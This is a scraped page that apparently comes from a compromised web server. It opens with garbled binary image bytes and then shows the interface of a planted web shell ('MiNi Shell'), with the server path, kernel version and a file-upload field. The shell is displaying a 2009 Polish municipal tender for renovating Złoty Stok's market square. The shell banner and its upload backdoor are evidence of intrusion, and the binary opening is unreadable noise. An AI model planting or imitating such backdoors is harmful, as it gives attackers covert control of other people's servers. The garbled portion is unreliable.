JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090518/153872-N-2009.html

<p class="kh_header"><b>Złoty Stok: Rewitalizacja nawierzchni Rynku w Złotym Stoku wraz z przebudową infrastruktury technicznej</b><br>
<b>Numer ogłoszenia: 153872 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Złoty Stok , ul. Rynek 22, 57-250 Złoty Stok, tel. 0 74 8164164, faks 0 74 8164133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja nawierzchni Rynku w Złotym Stoku wraz z przebudową infrastruktury technicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest inwestycja polegająca na wykonaniu rewitalizacji nawierzchni i przebudowie infrastruktury Rynku w Złotym Stoku. Prace obejmują wymianę istniejącej sieci wodociągowej i kanalizacji deszczowej wraz z przyłączami,  budowę przyłącza kanalizacji sanitarnej dla posesji Rynek 20, wymianę oświetlenia ulicznego Rynku, remont nawierzchni Rynku z wykorzystaniem kostki kamiennej szarej i czarnej. Obszar objęty rewitalizacją to ok 5250m2.

W zakresie robót do wykonania są: 

I. Branża sanitarna.
Kanalizacja deszczowa.
Prace przygotowawcze i zabezpieczające teren robót .
- opracowanie ogólnego harmonogramu prac,  
- pomiary geodezyjne przygotowawcze,
- prace zabezpieczające teren robót przed osobami postronnymi wraz z właściwym oznakowaniem,
- organizacja ruchu drogowego w przypadku konieczności zamknięcia ulic oraz zorganizowanie dojazdów i dojść zastępczych wraz z właściwym oznakowaniem,      
- prace przygotowawcze w zakresie różnych nawierzchni - rozebranie istniejących nawierzchni ulic (kostka kamienna, płyty chodnikowe, mieszanka mineralno-bitumiczna)  w miejscach prowadzenia robót ziemnych.

Roboty ziemne. 
- wykonanie wykopów oraz przekopów pod sieć kanalizacyjną deszczową w gruncie kat IV  - 635.684m3,
- wykonanie wykopów linowych pod rurociągi 272,436m3,
- wykonanie pionowych ażurowych umocnień ścian wykopów liniowych pod sieć kanalizacyjną deszczową - 1684.200m2,
- wykonanie podłoża i obsypki pod sieć kanalizacyjną deszczową z piasku lub pospółki, 
- zasypywanie wykopów pospółką.

Roboty instalacyjne.
- wykonanie studni rewizyjnych z kręgów betonowych o o 1200mm, łączonych na uszczelki gumowe, z dnem oraz włazami typu ciężkiego, z zamontowanymi stopniami zejściowymi  - 9szt,
- wykonanie studni rewizyjnych z kręgów betonowych o o 1000mm, łączonych na uszczelki gumowe, z dnem oraz włazami typu ciężkiego, z zamontowanymi stopniami zejściowymi  - 3szt,
- wykonanie studni ślepych z włazami typu ciężkiego na wpięciach przyłączy deszczowych, na rurociągu o 400mm - 7szt,
- wykonanie studni ślepych z włazami typu ciężkiego na wpięciach przyłączy deszczowych, na rurociągu o 250mm - 4szt,
- wykonanie studni ślepych z włazami typu ciężkiego na wpięciach przyłączy deszczowych, na rurociągu o 200mm - 2szt,
- wykonanie kanałów z rur PCV klasy S o 400mm - 182m,
- wykonanie kanałów z rur PCV klasy S o 250mm - 60m,
- wykonanie kanałów z rur PCV klasy S o 200mm - 82m,
- wykonanie kanałów z rur PCV klasy S o 160mm - 165m,
- wykonanie podłoży z pianobetonu - 20m3,
- wykonanie studzienek ściekowych ulicznych betonowych z osadnikiem - 13szt,
- wykonanie przyłączy kanalizacji deszczowej wraz z czyszczakami - 23szt,  
- wykonanie wpięcia istniejącej kanalizacji deszczowej o 500mm do studni o 1200mm - 1szt,
- wykonanie wpięcia istniejącej kanalizacji deszczowej o 400mm do studni o 1200mm - 2szt,
- wykonanie wpięcia istniejącej kanalizacji deszczowej o 200mm do studni o 1200mm - 4szt,
- wykonanie odwodnień liniowych przykrytych rusztem - 18m,
- roboty w zakresie demontażu odcinków istniejącej kanalizacji deszczowej i jej elementów, 
- wykonanie przyłącza kanalizacji sanitarnej dla posesji Rynek 20  o 160mm  wraz ze studnią rewizyjną.

Prace związane z odbiorami technicznymi, geodezyjnymi pomiarami powykonawczymi, uporządkowaniem terenu i  przekazaniem do eksploatacji.
- wykonanie prób wodnych szczelności kanałów rurowych,
- wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
- uporządkowanie budowy i przyległych terenów,
- wykonanie dokumentacji geodezyjnej powykonawczej.

Sieć wodociągowa.
Wymieniana sieć wodociągowa stanowi częściowo sieć przesyłową, a częściowo rozdzielczą.
Wymianie podlegają sieci i przyłącza w obrębie Rynku.

Prace przygotowawcze i zabezpieczające teren robót .
- opracowanie ogólnego harmonogramu prac,  
- pomiary geodezyjne przygotowawcze,
- prace zabezpieczające teren robót przed osobami postronnymi wraz z właściwym oznakowaniem,
- organizacja ruchu drogowego w przypadku konieczności zamknięcia ulic oraz zorganizowanie dojazdów i dojść zastępczych wraz z właściwym oznakowaniem,      
- prace przygotowawcze w zakresie różnych nawierzchni - rozebranie istniejących nawierzchni ulic (kostka kamienna, płyty chodnikowe, mieszanka mineralno-bitumiczna)  w miejscach prowadzenia robót ziemnych. 
Roboty ziemne. 
- wykonanie wykopów oraz przekopów pod sieć wodociągową w gruncie kat IV  - 364.616m3,
- wykonanie wykopów linowych pod rurociągi 156,264m3,
- wykonanie pionowych ażurowych umocnień ścian wykopów liniowych pod sieć wodociągową - 1302.200m2,
- wykonanie podłoża i obsypki pod sieć wodociągową z piasku lub pospółki, 
- zasypywanie wykopów pospółką.

Roboty instalacyjne.
- wykonanie rurociągów z rur ciśnieniowych polietylenowych PEHD zgrzewanych o o  125mm - 102m, wraz z uzbrojeniem sieci,
- wykonanie rurociągów z rur ciśnieniowych polietylenowych PEHD zgrzewanych o o  110mm - 168m, wraz z uzbrojeniem sieci,
- wykonanie przyłączy wodociągowych z rur ciśnieniowych polietylenowych PEHD o o 40mm - 66m, wraz z uzbrojeniem i przełączeniem instalacji do sieci,
- wykonanie przyłączy wodociągowych z rur ciśnieniowych polietylenowych PEHD o o 32mm - 47m, wraz z uzbrojeniem i przełączeniem instalacji do sieci,
- wykonanie studzienki wodomierzowej o o 1000mm - 1szt,  o 600mm - 1szt,
- oznakowanie tras sieci taśmą z tworzywa sztucznego i tabliczkami, 
- roboty w zakresie demontażu odcinków istniejącej sieci wodociągowej i jej elementów.

Prace związane z odbiorami technicznymi, geodezyjnymi pomiarami powykonawczymi, uporządkowaniem terenu i  przekazaniem do eksploatacji.
- wykonanie prób wodnych szczelności i dezynfekcji sieci wodociągowej,
- wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
- uporządkowanie budowy i przyległych terenów,
- wykonanie dokumentacji geodezyjnej powykonawczej.

II. Branża elektryczna.
Prace przygotowawcze i zabezpieczające terenu robót .
- opracowanie ogólnego harmonogramu prac,  
- pomiary geodezyjne przygotowawcze,
- prace zabezpieczające teren robót przed osobami postronnymi wraz z właściwym oznakowaniem,
- organizacja ruchu drogowego w przypadku konieczności zamknięcia ulic oraz zorganizowanie dojazdów i dojść zastępczych wraz z właściwym oznakowaniem,      
- prace przygotowawcze w zakresie różnych nawierzchni - rozebranie istniejących nawierzchni ulic (kostka kamienna, płyty chodnikowe, mieszanka mineralno-bitumiczna)  w miejscach prowadzenia robót ziemnych.

Roboty ziemne. 
- wykonanie wykopów pod kable i fundamenty słupów oświetleniowych w gruncie kat. IV - 91,40m3,
- wykonanie podłoża piaskowego pod kable - 1828,00m,
- zasypywanie wykopów pod kable i fundamenty.

Roboty instalacyjne. 
- układanie kabli wielożyłowych YAKXS 4x25mm2 - 457.00m,
- montaż uziomów poziomych w wykopie - 457.00m,
- ułożenie rur osłonowych z PCW - 12m, 
- montaż i stawianie słupów oświetleniowych wraz z przyłączeniem do sieci elektrycznej - 25szt,
- montaż opraw oświetleniowych na słupach - 42szt,
- dokonanie przyłączenia do sieci zasilającej,
- roboty w zakresie demontażu odcinków istniejącej instalacji oświetleniowej i jej elementów.

Prace związane z odbiorami technicznymi, geodezyjnymi pomiarami powykonawczymi, uporządkowaniem terenu i  przekazaniem do eksploatacji.
- wykonanie pomiarów i badań instalacji elektrycznej,
- wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
- uporządkowanie budowy i przyległych terenów,
- wykonanie dokumentacji geodezyjnej powykonawczej.

III. Branża drogowa.
Dane charakterystyczne:
- obciążenie drogi ruchem - dla nawierzchni jezdni ze względu na możliwość ruchu i
postoju autobusów i samochodów ciężarowych założono konstrukcję jak dla
nawierzchni stanowisk postojowych samochodów ciężarowych
- dla nawierzchni chodników założono konstrukcję umożliwiającą postój samochodów o
ciężarze całkowitym nie większym niż 2 500 kG
- klasa techniczna drogi Z - funkcja droga zbiorcza
- prędkości projektowa Vp = 40 km/h
- szerokość jezdni zmienna: od 6,00 do 22,00 m łącznie ze stanowiskami postojowymi
- obramowanie krawężnikiem kamiennym oddzielającym ciągi piesze - chodniki o
szerokości 2,00; 2,50; 5,00 m.

Prace przygotowawcze i zabezpieczające teren robót.
- opracowanie ogólnego harmonogramu prac,  
- pomiary geodezyjne przygotowawcze,
- prace zabezpieczające teren robót przed osobami postronnymi wraz z właściwym oznakowaniem,
- organizacja ruchu drogowego w przypadku konieczności zamknięcia ulic oraz zorganizowanie dojazdów i dojść zastępczych wraz z właściwym oznakowaniem,      
- prace przygotowawcze w zakresie różnych nawierzchni - rozebranie istniejących nawierzchni Rynku (kostka kamienna, płyty chodnikowe, mieszanka mineralno-bitumiczna, kostka kamienna do ponownego wykorzystania ok. 20%),
- regulacja pionowa studzienek kanalizacyjnych, wodociągowych i telefonicznych i .

Roboty ziemne.
- wykonanie koryta na całej szerokości na głęb. 20cm - 4743,280m2,
- profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne - 4743,280m2,
- wykonanie podbudowy pod chodnikami z kruszywa łamanego grub. warstwy po zagęszczeniu 15cm - 1342,540m2,
- wykonanie podbudowy pod jezdnią z kruszywa łamanego grub. warstwy po zagęszczeniu 24cm - 3078,94m2,

Roboty nawierzchniowe.
- wykonanie ław betonowych z betonu B-15 pod ściekiem - 31.092m3,
- wykonanie ław betonowych z oporem pod krawężnik z betonu B-15, wys. 20cm - 44.986m3,
- ustawienie krawężników kamiennych granitowych 20x25cm na podsypce cementowo-piaskowej grub. 5cm, na gotowej ławie betonowej - 436.760m3,
- wykonanie ścieku przychodnikowego z kamiennej kostki brukowej, szarej o grubości 8 cm na podsypce cementowo-piaskowej (1:4), na gotowej ławie betonowej, spoiny wypełnione zaprawą cementową-119.081m2,
- wykonanie nawierzchni jezdni z kostki kamiennej granitowej szarej, rzędowej na podsypce cementowo-piaskowej grub. 3cm (1:4) wraz z wypełnieniem spoin zaprawą cementową oraz pielęgnacją powierzchni przez posypanie piaskiem i polewanie wodą, wys. kostki 14cm - 3078.940m2,
- wykonanie nawierzchni chodników z kostki kamiennej granitowej lub bazaltowej czarnej  na podsypce cementowo-piaskowej grub. 3cm (1:4) wraz z wypełnieniem spoin   żwirem oraz pielęgnacją powierzchni przez posypanie piaskiem i polewanie wodą, wys. kostki 6-8cm - 1342.540m2,
- uzupełnienie ubytków cokołów elewacji budynków przy połączeniu z nawierzchnią Rynku.

Prace związane z odbiorami technicznymi, geodezyjnymi pomiarami powykonawczymi, uporządkowaniem terenu i  przekazaniem do eksploatacji.
- wykonanie odbiorów technicznych,
- wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
- uporządkowanie budowy i przyległych terenów,
- zakup i montaż znaków drogowych (znaki przeznaczone do kategorii dróg wewnętrznych):
-znak nakazu C-12 ruch okrężny i znak ostrzegawczy A-7 ustąp pierwszeństwa, - 4kpl na wspólnym słupku,
-znak - uwaga zmiana organizacji ruchu - 4kpl,
- wykonanie dokumentacji geodezyjnej powykonawczej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.00.00-8, 45.23.30.00-9, 45.11.12.00-0, 45.23.21.30-2, 45.23.13.00-8, 45.31.61.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy: 
1)spełniają warunki wynikające z art. 22 ust.1 ustawy, tzn.: 
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia; 
2)wykażą się odpowiednim doświadczeniem, tj.: w ostatnich 5 latach, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej 1 podobne zadanie, odpowiadające rodzajem i wartością robotom budowlanym, stanowiącym przedmiot zamówienia (1 zadanie - w zakresie nawierzchni brukowanej, 1 zadanie - w zakresie instalacji sanitarnych i wodociągowych, 1 zadanie w zakresie oświetlenia ulicznego)
3)wykażą się dysponowaniem osobami zdolnymi do wykonania zamówienia, tj.: posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydanych na podstawie ustawy z dn. 7 lipca 1994  Prawo budowlane (Dz.U.Nr 156 z 2006, poz. 1118, z późn. zm.) oraz rozporządzenia Ministra Transportu i Budownictwa z dn. 28 kwietnia 2006, w sprawie samodzielnych funkcji technicznych w budownictwie (Dz,U.Nr 83 z 2006, poz. 578), lub przepisów uprzednio obowiązujących w tym zakresie.
4)są ubezpieczeni od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej.
5)W przypadku gdy o udzielenie zamówienia ubiega się konsorcjum, wówczas wymaga się, aby żaden z jego członków nie podlegał wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy, a członkowie łącznie spełniali warunki określone w pkt 1 ust. 2-5 niniejszego rozdziału.
6)Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów. Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na potwierdzenie spełniania warunków udziału w postępowaniu, określonych w rozdziale VI niniejszej specyfikacji, Wykonawcy muszą przedstawić następujące dokumenty: 
a - oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 Prawa zamówień publicznych (zał. 3 do SIWZ)
b - wykaz wykonanych robót budowlanych - zgodnie z pkt 2, rozdz. VI SIWZ,  (zał. 4 do SIWZ) oraz  dokumenty, że roboty zostały wykonane należycie, np. referencje.
c - wykaz osób, które będą uczestniczyć w realizacji zamówienia - zgodnie z  pkt 3, rozdz. VI SIWZ (zał. 5 do SIWZ)
d - polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności (co najmniej na czas realizacji zadania)
e - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
f - oświadczenie lub zaświadczenie potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne lub społeczne w Zakładzie Ubezpieczeń Społecznych lub w Kasie Rolniczego Ubezpieczenia Społecznego, lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.Dokumenty, o których mowa w rozdziale VII niniejszej specyfikacji, należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę/y uprawnioną/e do reprezentacji Wykonawcy.
3.W przypadku konsorcjum dokumenty wymienione w rozdziale VII niniejszej specyfikacji przedstawia każdy z członków konsorcjum. Pozostałe dokumenty mogą być przedstawione przez jednego Wykonawcę lub wspólnie.
4.W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i przy zawarciu umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zlotystok.biuletyn.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
pok.22.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2009 godzina 10:00, miejsce: Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
pok. nr 7 sekretariat Urzędu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com